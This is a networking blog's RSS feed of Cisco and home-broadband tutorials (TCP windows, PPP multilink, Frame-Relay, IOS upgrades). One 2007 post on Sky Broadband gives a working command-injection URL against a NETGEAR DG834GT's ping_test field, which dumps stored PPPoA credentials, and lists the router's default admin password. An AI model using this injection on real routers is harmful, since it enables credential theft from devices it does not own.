<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Fnode Networks &#187; Networking</title>
	<atom:link href="http://www.fnode.com/category/networking/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.fnode.com</link>
	<description></description>
	<lastBuildDate>Wed, 23 Nov 2011 20:18:59 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=</generator>
		<item>
		<title>TCP Window Calculation</title>
		<link>http://www.fnode.com/2009/10/tcp-window-calculation/</link>
		<comments>http://www.fnode.com/2009/10/tcp-window-calculation/#comments</comments>
		<pubDate>Tue, 20 Oct 2009 08:30:01 +0000</pubDate>
		<dc:creator>Nish Vamadevan</dc:creator>
				<category><![CDATA[Networking]]></category>
		<category><![CDATA[TCP Window]]></category>

		<guid isPermaLink="false">http://www.fnode.com/?p=533</guid>
		<description><![CDATA[I was going through some TCP windowing over a high speed WAN link, and thought it might be worth to post some info regarding this. We do face a typical problem of having slow speed file transfer even if the dedicated pipe is capable of supporting it. There are three factors which affects this&#8230; TCP [...]]]></description>
			<content:encoded><![CDATA[<p></p><p><span class="drop_cap">I</span> was going through some <acronym title="Transmission Control Protocol">TCP</acronym> windowing over a high speed <acronym title="Wide Area Network">WAN</acronym> link, and thought it might be worth to post some info regarding this.</p>
<p>We do face a typical problem of having slow speed file transfer even if the dedicated pipe is capable of supporting it.</p>
<p>There are three factors which affects this&#8230;</p>
<ol>
<li><acronym title="Transmission Control Protocol">TCP</acronym> Window Size.</li>
<li>Round trip latency of the circuit.</li>
<li>Bandwidth of the circuit.</li>
</ol>
<p>Maximum throughput you can get from a line with 10ms latency and a <acronym title="Transmission Control Protocol">TCP</acronym> window of 32KB can be calculated with&#8230;</p>
<p>32KB &#8211;&gt; 32 x 1024 x 8 = 262144 Bits</p>
<p>262144 ÷ 0.01 = 26214400 bps = 26.2144 Mbps</p>
<p>Let’s say we have an OC-3 line, which is at 155 Mbps and a round trip latency of 10ms, and we need to calculate the <acronym title="Transmission Control Protocol">TCP</acronym> window size to maximize the throughput&#8230;</p>
<p>155.52 x 10<sup>6</sup> = 155520000 bps</p>
<p>TCP_WINDOW = 155520000 x 0.01 = 1555200 Bits = 194400 Bytes = <strong>189.84375</strong> <acronym title="Kilobyte">KB</acronym></p>
<p>Hope I got the calculation right <img src='http://www.fnode.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>]]></content:encoded>
			<wfw:commentRss>http://www.fnode.com/2009/10/tcp-window-calculation/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to configure PPP Multilink</title>
		<link>http://www.fnode.com/2009/09/how-to-configure-ppp-multilink/</link>
		<comments>http://www.fnode.com/2009/09/how-to-configure-ppp-multilink/#comments</comments>
		<pubDate>Tue, 15 Sep 2009 23:19:39 +0000</pubDate>
		<dc:creator>Nish Vamadevan</dc:creator>
				<category><![CDATA[Networking]]></category>
		<category><![CDATA[Mu1]]></category>
		<category><![CDATA[multilink]]></category>
		<category><![CDATA[ppp]]></category>
		<category><![CDATA[ppp multilink]]></category>

		<guid isPermaLink="false">http://www.fnode.com/?p=513</guid>
		<description><![CDATA[Multilink is a way of bundling more than one PPP WAN links and bundle them together into one logical interface. This is one of the method you can implement when you have a primary and secondary links in place and create a logical conduit where both links are present. This method can be used to [...]]]></description>
			<content:encoded><![CDATA[<p></p><p><span class="drop_cap">M</span>ultilink is a way of bundling more than one PPP <acronym title="Wide Area Network">WAN</acronym> links and bundle them together into one logical interface. This is one of the method you can implement when you have a primary and secondary links in place and create a logical conduit where both links are present.</p>
<p>This method can be used to load balance data across the links and at the same time it will support redundancy when one one link fails.</p>
<p>I have tested this configuration on 2 of my 2500 Routers and I haven’t tested these on more recent <acronym title="Internetwork Operating System">IOS</acronym> so some commands may vary. I will be checking them on a pair of 3845s/2691s on a later date and will add my findings to this post.</p>
<p>As you can see the Diagram, I am using R4 and R5 which are connected via Serial 0 and Serial 1 respectivly.</p>
<p style="text-align: center;"><img class="size-full wp-image-514 aligncenter" title="multilink" src="http://www.fnode.com/wp-content/uploads/multilink.png" alt="multilink" width="552" height="118" /></p>
<p><strong>R4 Configuration</strong></p>
<pre>Multilink Interface
interface Multilink1
ip address 172.16.1.1 255.255.255.252
ppp multilink
ppp multilink links maximum 2
ppp multilink links minimum 1
ppp multilink group 1</pre>
<p><strong>Serial 0</strong></p>
<pre>interface Serial0
no ip address
encapsulation ppp
clock rate 64000
ppp multilink
ppp multilink group 1</pre>
<p><strong>Serial 1</strong></p>
<pre>interface Serial1
no ip address
encapsulation ppp
clock rate 64000
ppp multilink
ppp multilink group 1
</pre>
<p>As you can see, since this is a lab scenario, I have set the <strong>clock rate</strong> on the link. If you are setting this up on a <acronym title="Wide Area Network">WAN</acronym> link, you don’t need to do this as the circuit provider would be setting this up for you.</p>
<p><span id="more-513"></span></p>
<p>Also another thing to watch out for is to <strong>create the Multilink interface first</strong> then move onto configuring the Serial interfaces. If you do the other way around, it will not allow you to set the <strong>multilink group</strong> as it is not present on the router (See the error message below).</p>
<pre>R4(config-if)#ppp multi gr 1
% Cannot set multilink group. Interface Multilink1 does not exist</pre>
<p>That is all to watch out for and you can see my R5 configuration below&#8230;</p>
<p><strong>R5 Configuration</strong></p>
<p><strong>Multilink</strong></p>
<pre>interface Multilink1
ip address 172.16.1.2 255.255.255.252
ppp multilink
ppp multilink links maximum 2
ppp multilink links minimum 1
ppp multilink group 1
</pre>
<p><strong>Serial 0</strong></p>
<pre>interface Serial0
no ip address
encapsulation ppp
ppp multilink
ppp multilink group 1</pre>
<p><strong>Serial 1</strong></p>
<pre>interface Serial1
no ip address
encapsulation ppp
ppp multilink
ppp multilink group 1</pre>
<p>Here is how it should look&#8230;</p>
<pre>R4#sh ip int br | i up
Multilink1    172.16.1.1    YES   manual  up  up
Serial0       unassigned    YES   manual  up  up
Serial1       unassigned    YES   manual  up  up</pre>
<pre>R5#sh ip int br | i up
Multilink1    172.16.1.2    YES   manual  up  up
Serial0       unassigned    YES   manual  up  up
Serial1       unassigned    YES   manual  up  up</pre>
<pre>R4#ping 172.16.1.1
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 172.16.1.1, timeout is 2 seconds:
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 40/44/52 ms
R4#</pre>
<p>Now I will bring Serial 0 interface down and test the Multilink&#8230;</p>
<pre>R4(config)#int se0
R4(config-if)#shut
R4(config-if)#</pre>
<pre>*Mar  1 01:19:41.123: %LINK-5-CHANGED: Interface Serial0, changed state to administratively down
*Mar  1 01:19:42.123: %LINEPROTO-5-UPDOWN: Line protocol on Interface Serial0, changed state to down</pre>
<pre>R4(config-if)#do sh ip int br
Interface     <acronym title="Internet Protocol">IP</acronym>-Address   OK?    Method  Status              Protocol
Ethernet0     unassigned   YES    NVRAM   administratively    down  down
Multilink1    172.16.1.1   YES    manual  up                  up
Serial0       unassigned   YES    manual  administratively    down  down
Serial1       unassigned   YES    manual  up                  up</pre>
<pre>R4(config-if)#do ping 172.16.1.2
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 172.16.1.2, timeout is 2 seconds:
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 32/32/36 ms
R4(config-if)#</pre>
<p>As you can see, it works even when one interface is down&#8230; <img src='http://www.fnode.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>]]></content:encoded>
			<wfw:commentRss>http://www.fnode.com/2009/09/how-to-configure-ppp-multilink/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>How to Configure Frame-Relay</title>
		<link>http://www.fnode.com/2009/09/frame-relay-config/</link>
		<comments>http://www.fnode.com/2009/09/frame-relay-config/#comments</comments>
		<pubDate>Mon, 14 Sep 2009 23:48:42 +0000</pubDate>
		<dc:creator>Nish Vamadevan</dc:creator>
				<category><![CDATA[Networking]]></category>
		<category><![CDATA[frame-relay]]></category>
		<category><![CDATA[framerelay]]></category>

		<guid isPermaLink="false">http://www.fnode.com/?p=493</guid>
		<description><![CDATA[Frame-Relay is one of the core concept of networking and nowadays it is one of the under appreciated part on modern networking. I am just going to go over how to configure it using 4 Routers and one will act as a Frame-Relay cloud. Before I go ahead and explain the configuration, You can see [...]]]></description>
			<content:encoded><![CDATA[<p></p><p><span class="drop_cap">F</span>rame-Relay is one of the core concept of networking and nowadays it is one of the under appreciated part on modern networking.</p>
<p>I am just going to go over how to configure it using 4 Routers and one will act as a Frame-Relay cloud.</p>
<p>Before I go ahead and explain the configuration, You can see the below diagram which represents the physical topology.</p>
<p style="text-align: center;"><img class="size-full wp-image-495 aligncenter" title="FRS1" src="http://www.fnode.com/wp-content/uploads/FRS1.png" alt="FRS1" width="511" height="544" /></p>
<p>As you can see, <acronym title="Frame-Relay Switch">FRS</acronym> is connected via&#8230;</p>
<p>Serial 1/1 to R1 Serial 1/0<br />
Serial 1/2 to R2 Serial 1/0<br />
Serial 1/3 to R3 Serial 1/0</p>
<p><span id="more-493"></span></p>
<p>Now we have got the physical topology clear, we will move onto Frame-Relay configuration and the DLCI assignment.</p>
<p style="text-align: center;"><img class="size-full wp-image-496 aligncenter" title="FRS2" src="http://www.fnode.com/wp-content/uploads/FRS2.png" alt="FRS2" width="511" height="534" /></p>
<p>As you can see the DLCI configuration&#8230;</p>
<p>On R1 : DLCI 122 is connected to R2 and DLCI 123 is connected to R3<br />
On R2 : DLCI 221 is connected to R1<br />
On R3: DLCI 321 is connected to R3.</p>
<p>If you are configuring the DLCI then I would suggest you follow this method of numbering, Because from the DLCI Number, I can simply distinguish where the DLCI is connecting to&#8230;</p>
<p><!--more--></p>
<p>For Example, we will take DLCI 122 (One Two Two ) I remember it as; From Router <strong>One</strong> 2 <strong>Two</strong> and the same goes for DLCI 321 (Three Two One) Router<strong> Three</strong> 2 <strong>One</strong>.</p>
<p>Here are the configuration on the <strong><acronym title="Frame-Relay Switch">FRS</acronym></strong> (Please see the first diagram for interface info&#8230;)</p>
<p><strong>Serial 1/1</strong></p>
<pre>interface Serial1/1
no ip address
encapsulation frame-relay
logging event subif-link-status
logging event dlci-status-change
clock rate 64000
no frame-relay inverse-arp
frame-relay intf-type dce
frame-relay route 122 interface Serial1/2 221
frame-relay route 123 interface Serial1/3 321</pre>
<p><strong>Serial 1/2</strong></p>
<pre>interface Serial1/2
no ip address
encapsulation frame-relay
logging event subif-link-status
logging event dlci-status-change
clock rate 64000
no frame-relay inverse-arp
frame-relay intf-type dce
frame-relay route 221 interface Serial1/1 122</pre>
<p><strong>Serial 1/3</strong></p>
<pre>interface Serial1/3
no ip address
encapsulation frame-relay
logging event subif-link-status
logging event dlci-status-change
clock rate 64000
no frame-relay inverse-arp
frame-relay intf-type dce
frame-relay route 321 interface Serial1/1 123</pre>
<p>As you can see, if you are configuring Frame-Relay you should understand what every command does and I will be writing a more detailed post on Frame-Relay switching where all of these commands will be covered.</p>
<p>Now the <acronym title="Frame-Relay Switch">FRS</acronym> is set, we will go ahead and configure each interface of the routers R1, R2 and R3.</p>
<p><strong>R1</strong></p>
<pre>interface Serial1/0
ip address 172.16.10.1 255.255.255.0
encapsulation frame-relay
logging event subif-link-status
logging event dlci-status-change
no fair-queue
frame-relay map ip 172.16.10.2 122 broadcast
frame-relay map ip 172.16.10.3 123 broadcast
no frame-relay inverse-arp</pre>
<p><strong>R2</strong></p>
<pre>interface Serial1/0
ip address 172.16.10.2 255.255.255.0
encapsulation frame-relay
logging event subif-link-status
logging event dlci-status-change
no fair-queue
frame-relay map ip 172.16.10.1 221 broadcast
frame-relay map ip 172.16.10.3 221 broadcast
no frame-relay inverse-arp</pre>
<p><strong>R3</strong></p>
<pre>interface Serial1/0
ip address 172.16.10.3 255.255.255.0
encapsulation frame-relay
logging event subif-link-status
logging event dlci-status-change
no fair-queue
frame-relay map ip 172.16.10.1 321 broadcast
frame-relay map ip 172.16.10.2 321 broadcast
no frame-relay inverse-arp</pre>
<p>The most important commands are &#8220;Frame-Relay Map&#8221; on the Routers and the &#8220;Frame-Relay Route&#8221; command on the Frame switching router.</p>
<p>As you can see, I have the <strong>Broadcast</strong> option at the end of the &#8220;frame-relay map&#8221; command; It is there to allow routing packets such as RIP to be passed through the Frame network. Without this option, it will not allow <acronym title="Internet Protocol">IP</acronym> traffic to be switch through frame network.</p>
<p>If you don&#8217;t get the DLCI mapping correct, you will not get the circuit to come &#8220;active&#8221;</p>
<p>You can check the Frame route by issuing the &#8220;show frame-relay route&#8221; command on <acronym title="Frame-Relay Switch">FRS</acronym>.</p>
<pre><acronym title="Frame-Relay Switch">FRS</acronym>#sh fr ro
Input Intf   Input Dlci   Output Intf   Output Dlci   Status
Serial1/1    122          Serial1/2     221           active
Serial1/1    123          Serial1/3     321           active
Serial1/2    221          Serial1/1     122           active
Serial1/3    321          Serial1/1     123           active
<acronym title="Frame-Relay Switch">FRS</acronym>#</pre>
<p>And &#8220;show frame-relay map&#8221; on the Routers (R1, R2, R3)</p>
<pre>R1#sh frame map
Serial1/0 (up): ip 172.16.10.2 dlci 122(0x7A,0x1CA0), static,
broadcast,
CISCO, status defined, active
Serial1/0 (up): ip 172.16.10.3 dlci 123(0x7B,0x1CB0), static,
broadcast,
CISCO, status defined, active

R2#sh frame map
Serial1/0 (up): ip 172.16.10.1 dlci 221(0xDD,0x34D0), static,
broadcast,
CISCO, status defined, active
Serial1/0 (up): ip 172.16.10.3 dlci 221(0xDD,0x34D0), static,
broadcast,
CISCO, status defined, active

R3#sh frame map
Serial1/0 (up): ip 172.16.10.1 dlci 321(0x141,0x5010), static,
broadcast,
CISCO, status defined, active
Serial1/0 (up): ip 172.16.10.2 dlci 321(0x141,0x5010), static,
broadcast,
CISCO, status defined, active
</pre>
<p>If it says &#8220;inactive&#8221; or &#8220;deleted&#8221;, I would first check the DLCI assignment and encapsulation and so forth&#8230;</p>
<p>And it is always nice to see the following message&#8230;</p>
<pre>*Mar  1 00:00:21.005: %FR-5-DLCICHANGE: Interface Serial1/1 - DLCI 122 state changed to ACTIVE
*Mar  1 00:00:21.005: %FR-5-DLCICHANGE: Interface Serial1/1 - DLCI 123 state changed to ACTIVE
*Mar  1 00:00:21.098: %FR-5-DLCICHANGE: Interface Serial1/2 - DLCI 221 state changed to ACTIVE
*Mar  1 00:00:21.146: %FR-5-DLCICHANGE: Interface Serial1/3 - DLCI 321 state changed to ACTIVE</pre>]]></content:encoded>
			<wfw:commentRss>http://www.fnode.com/2009/09/frame-relay-config/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>IP helper-address Explained</title>
		<link>http://www.fnode.com/2009/08/ip-helper-address-explained/</link>
		<comments>http://www.fnode.com/2009/08/ip-helper-address-explained/#comments</comments>
		<pubDate>Tue, 18 Aug 2009 14:58:35 +0000</pubDate>
		<dc:creator>Nish Vamadevan</dc:creator>
				<category><![CDATA[Networking]]></category>
		<category><![CDATA[forward-protocol]]></category>
		<category><![CDATA[helper-address]]></category>

		<guid isPermaLink="false">http://www.fnode.com/?p=441</guid>
		<description><![CDATA[All broadcasts messages are dropped by the router when it receives on an interface. This specific command is enables the router to convert the broadcast messages distended for a specific destination into unicast. This interface level command needs to be applied on the interface which the broadcast receives from. R1(config-if)#ip helper-address 10.10.10.10 Also there are [...]]]></description>
			<content:encoded><![CDATA[<p></p><p><span class="drop_cap">A</span>ll broadcasts messages are dropped by the router when it receives on an interface. This specific command is enables the router to convert the broadcast messages distended for a specific destination into unicast. This interface level command needs to be applied on the interface which the broadcast receives from.</p>
<pre>R1(config-if)#ip helper-address 10.10.10.10</pre>
<p>Also there are other options where you point the address to a vrf etc&#8230;</p>
<p>The following broadcasts are forwarded by default&#8230;</p>
<p>TIME &#8211; Port 37<br />
TACACS &#8211; Port 49<br />
<acronym title="Domain Name Server">DNS</acronym> &#8211; Port 53<br />
BOOTP/DHCP Server &#8211; Port 67<br />
BOOTP/DHCP Client &#8211; Port 68<br />
<acronym title="Trivial File Transfer Protocol">TFTP</acronym> &#8211; Port 69<br />
NetBIOS Name Service &#8211; Port 137<br />
NetBios Datagram Service &#8211; Port 138</p>
<p>Other protocols can be forwarded by using the following Global config commanding&#8230;</p>
<pre>R1(config)#ip forward-protocol udp ?</pre>
<p>Use the ? to see the supported protocols. You may use the following command to remove a specific protocol being forwarded&#8230;</p>
<pre>R1(config)#no ip forward-protocol udp ?</pre>]]></content:encoded>
			<wfw:commentRss>http://www.fnode.com/2009/08/ip-helper-address-explained/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to do an IOS Upgrade via TFTP</title>
		<link>http://www.fnode.com/2009/06/how-to-do-an-ios-upgrade-via-tftp/</link>
		<comments>http://www.fnode.com/2009/06/how-to-do-an-ios-upgrade-via-tftp/#comments</comments>
		<pubDate>Fri, 12 Jun 2009 01:11:13 +0000</pubDate>
		<dc:creator>Nish Vamadevan</dc:creator>
				<category><![CDATA[Networking]]></category>
		<category><![CDATA[Cisco Update Image]]></category>
		<category><![CDATA[IOS Upgrade]]></category>
		<category><![CDATA[TFTP Update]]></category>

		<guid isPermaLink="false">http://www.fnode.com/?p=393</guid>
		<description><![CDATA[There are many free TFTP server sortware out there, just install one. First of all, make sure you have IP reachablity to the TFTP Server. You can do that via Ping&#8230; Then check whether TCP port 69 is open. Usually it is not the case, but when it comes to troubleshooting, it is the first [...]]]></description>
			<content:encoded><![CDATA[<p></p><p>There are many free <acronym title="Trivial File Transfer Protocol">TFTP</acronym> server sortware out there, just install one.</p>
<p>First of all, make sure you have <acronym title="Internet Protocol">IP</acronym> reachablity to the <acronym title="Trivial File Transfer Protocol">TFTP</acronym> Server. You can do that via Ping&#8230;</p>
<p>Then check whether <acronym title="Transmission Control Protocol">TCP</acronym> port 69 is open. Usually it is not the case, but when it comes to troubleshooting, it is the first thing to check after a succesful Ping test.</p>
<p>Jump onto the router you are going to do the <acronym title="Internetwork Operating System">IOS</acronym> upgrade.</p>
<p>Make sure the <acronym title="Internetwork Operating System">IOS</acronym> you are going to replace it with is compatible with your router &amp; also you have the necessary Flash / RAM.</p>
<p>If your Flash is big enough to have more than two <acronym title="Internetwork Operating System">IOS</acronym> images, then you can straight away go and download it from the <acronym title="Trivial File Transfer Protocol">TFTP</acronym> Server.</p>
<p>If you are going to have two <acronym title="Internetwork Operating System">IOS</acronym> images in flash, you need to specify the router which image to load on boot. It can be done via the following command&#8230;</p>
<p><span id="more-393"></span></p>
<p><strong>boot system flash IMAGE_NAME_HERE</strong></p>
<p>Example:<br />
<code>Router(config)#boot system flash c2691-adventerprisek9_ivs-mz.124-15.T9.bin</code><br />
If the flash is not big enough to have both images, you need to delete the old image.</p>
<p>I usually use the command show flash: then delete the content via the command delete flash:</p>
<p>You can see an example here&#8230;</p>
<p><code>Router#show flash: all<br />
-#- --length-- -----date/time------ path<br />
1     32293924 Mar 1 1993 00:23:52 +00:00 c2691-adventerprisek9-mz.124-5a.bin<br />
31739904 bytes available (32296960 bytes used)<br />
Router#delete flash:<br />
Delete filename []? c2691-adventerprisek9-mz.124-5a.bin<br />
Delete flash:c2691-adventerprisek9-mz.124-5a.bin? [confirm]<br />
Router#<br />
Router#<br />
Router#<br />
Router#show flash:<br />
No files on device<br />
64036864 bytes available (0 bytes used)</code></p>
<p><strong><br />
Now copy the <acronym title="Internetwork Operating System">IOS</acronym> image from the <acronym title="Trivial File Transfer Protocol">TFTP</acronym> Server</strong></p>
<p>Copy tftp: flash:</p>
<p>Example here&#8230;</p>
<p><code>Router#copy tftp: flash:<br />
Address or name of remote host []? 192.168.1.100<br />
Source filename []? c2691-adventerprisek9_ivs-mz.124-15.T9.bin<br />
Destination filename [c2691-adventerprisek9_ivs-mz.124-15.T9.bin]?<br />
Accessing tftp://192.168.1.100/c2691-adventerprisek9_ivs-mz.124-15.T9.bin...<br />
Loading c2691-adventerprisek9_ivs-mz.124-15.T9.bin from 192.168.1.100 (via FastEthernet0/1):  !!!!!!!!!!</code></p>
<p>Sometimes the router might ask you to erase Flash: but I usually do that&#8230;</p>
<p>Reload the router and it should be able to run the new <acronym title="Internetwork Operating System">IOS</acronym> Image.</p>
<p>If you happen to have more than one <acronym title="Internetwork Operating System">IOS</acronym> on Flash: You can hardcode which version of <acronym title="Internetwork Operating System">IOS</acronym> to load with the global config command.</p>
<p><code>Router(config)#boot system flash c2691-adventerprisek9_ivs-mz.124-15.T9.bin</code></p>]]></content:encoded>
			<wfw:commentRss>http://www.fnode.com/2009/06/how-to-do-an-ios-upgrade-via-tftp/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to get Sky Broadband Login Info from the Router (Username &amp; Password etc)</title>
		<link>http://www.fnode.com/2007/10/how-to-get-sky-broadband-login-info-from-the-router-username-password-etc/</link>
		<comments>http://www.fnode.com/2007/10/how-to-get-sky-broadband-login-info-from-the-router-username-password-etc/#comments</comments>
		<pubDate>Fri, 12 Oct 2007 23:20:09 +0000</pubDate>
		<dc:creator>Nish Vamadevan</dc:creator>
				<category><![CDATA[Networking]]></category>

		<guid isPermaLink="false">http://www.nishv.com/2007/10/12/how-to-get-sky-broadband-login-info-from-the-router-username-password-etc/</guid>
		<description><![CDATA[Sky Broadband is aimed for home users thus a few features like SSH (Port 22), VPN and other tunneling are disabled by the router (NETGEAR DG834GT) they provide. If you want to use these features, you have two choices&#8230; Use another Router Re-flash the firmware of the Sky Router (NETGEAR DG834GT) Re-flashing the router is [...]]]></description>
			<content:encoded><![CDATA[<p></p><p>Sky Broadband is aimed for home users thus a few features like <acronym title="Secure Shell">SSH</acronym> (Port 22), <acronym title="Virtual Private Network">VPN</acronym> and other tunneling are disabled by the router (NETGEAR DG834GT) they provide. If you want to use these features, you have two choices&#8230;</p>
<ul>
<li>Use another Router</li>
<li>Re-flash the firmware of the Sky Router (NETGEAR DG834GT)</li>
</ul>
<p>Re-flashing the router is risky and I am sure it is against Sky’s Terms and Conditions, because as far as I’m aware, that router is a property of Sky. If you are thinking of doing it, then Good Luck!</p>
<p>Using another router is the smartest thing to do, But for you to use another router, you do need the Sky Username and Password.</p>
<p>This is how you get the Sky Username and Password&#8230;</p>
<p>Open up your browser and Copy and paste the following <acronym title="Uniform Resource Locator">URL</acronym> to the Address Bar. (Make sure its in one line, not two!)</p>
<pre>

http://192.168.0.1/setup.cgi?todo=ping_test&#038;c4_IPAddr=%26/bin/grep+ppoa_+/tmp/nvram+%3E+/www/netgear.cfg
</pre>
<p>It will ask for Username and Password, use the follwoing unless you have changed your Router Login info, then use that.</p>
<p><strong>Username:</strong>admin<br />
<strong> Password:</strong> sky</p>
<p>You will get a page that reads &#8220;Usage: ping [OPTION]&#8230; host&#8221;</p>
<p>Now Copy and paste the following <acronym title="Uniform Resource Locator">URL</acronym> to the Web Browser&#8217;s Address Bar.</p>
<pre>http://192.168.0.1/netgear.cfg</pre>
<p>This will then download a config file, &#8220;<strong>netgear.cfg</strong>&#8221;</p>
<p>Open the file with wordpad or any other Text Editor.</p>
<p>You should see some text like this below :</p>
<pre>
pppoa_username=001122aabbcc@skydsl
pppoa_password=a0b1c2d4e5
pppoa_idle=0
pppoa_ipaddr=
</pre>
<p>That’s it, Use those above info with another router, and you should be able to connect to Sky Broadband.</p>]]></content:encoded>
			<wfw:commentRss>http://www.fnode.com/2007/10/how-to-get-sky-broadband-login-info-from-the-router-username-password-etc/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Virgin Media / Telewest Broadband Via Router (WRT54GS)</title>
		<link>http://www.fnode.com/2006/09/virgin-media-telewest-broadband-via-router-wrt54gs/</link>
		<comments>http://www.fnode.com/2006/09/virgin-media-telewest-broadband-via-router-wrt54gs/#comments</comments>
		<pubDate>Sun, 03 Sep 2006 00:17:43 +0000</pubDate>
		<dc:creator>Nish Vamadevan</dc:creator>
				<category><![CDATA[Networking]]></category>

		<guid isPermaLink="false">http://www.nishv.com/2006/09/03/telewest-broadband-via-router-wrt54gs/</guid>
		<description><![CDATA[Since Telewest does not use authentication, it can be a bit puzzling if you are going to share your broadband internet connection via a Router. I will be using a LinkSys WRT54GS as an example&#8230; Before you do that, it is recommend doing the following&#8230; Turn off your modem and your Router for about 5 [...]]]></description>
			<content:encoded><![CDATA[<p></p><p class="MsoNormal"><span>Since Telewest does not use authentication, it can be a bit puzzling if you are going to share your broadband internet connection via a Router. I will be using a LinkSys <strong>WRT54GS</strong> as an example&#8230; </span></p>
<p class="MsoNormal"><span>Before you do that, it is recommend doing the following&#8230;</span></p>
<p class="MsoNormal"><span> </span></p>
<ul>
<li><span>Turn off your modem and your Router for about 5 minutes so your PC MAC lease will expire so you can use your Router&#8217;s MAC</span></li>
</ul>
<ul>
<li><span>If you are having MAC address issue, then you can get your Network Card&#8217;s MAC Address by going to</span></li>
</ul>
<p class="MsoNormal"><span> </span></p>
<p class="MsoNormal"><span><strong>Start</strong> =&gt; <em>type</em> <strong>CMD</strong> <em>type</em> <strong>ipconfig /all</strong></span></p>
<p class="MsoNormal"><span> </span></p>
<p class="MsoNormal"><span>Write it down, login to the router and use the MAC Address Clone Feature. It&#8217;s a 12 Digit code, looks something like this <strong>00-04-5B-89-21-7F</strong> </span></p>
<p class="MsoNormal"><span> </span></p>
<p class="MsoNormal"><span>If a cable provider does not use Authentication method, the only way to make your router talk to the modem is via <strong>Automatic Configuration &#8211; DHCP</strong>. </span></p>
<p class="MsoNormal"><span> </span></p>
<p class="MsoNormal"><span>It is also possible to do it via Static <acronym title="Internet Protocol">IP</acronym>, BUT if you are on a dynamic <acronym title="Internet Protocol">IP</acronym>, then the internet connection will not work when your <acronym title="Internet Service Provider">ISP</acronym> renews your <acronym title="Internet Protocol">IP</acronym>. </span></p>
<p class="MsoNormal"><span> </span></p>
<p class="MsoNormal"><span>If you are on a Static <acronym title="Internet Protocol">IP</acronym> and the <acronym title="Domain Name Server">DNS</acronym> / Default gateway does not change, then you can hook your modem directly to the PC, go to </span></p>
<p class="MsoNormal"><span> </span></p>
<p class="MsoNormal"><span><strong>Start</strong> =&gt; <em>type</em> <strong>CMD</strong> <strong>type</strong> <strong>ipconfig /all</strong></span></p>
<p class="MsoNormal"><span> </span></p>
<p class="MsoNormal"><span>Write down the values, and enter it in the Static <acronym title="Internet Protocol">IP</acronym> setting. </span></p>
<p class="MsoNormal"><span> </span></p>
<p class="MsoNormal"><span>This is how it is done if you are on a Dynamic <acronym title="Internet Protocol">IP</acronym>.</span></p>
<p class="MsoNormal"><span> </span></p>
<p class="MsoNormal"><span>Turn off your Modem, Reset your Router, and connect your modem and your PC to your router. Then select </span><strong><span>Automatic Configuration &#8211; DHCP</span></strong><span> Setting. </span></p>
<p class="MsoNormal"><span> </span></p>
<p class="MsoNormal"><span>That&#8217;s it, with a bit of luck, you should have an active internet connection via the Router!</span></p>]]></content:encoded>
			<wfw:commentRss>http://www.fnode.com/2006/09/virgin-media-telewest-broadband-via-router-wrt54gs/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

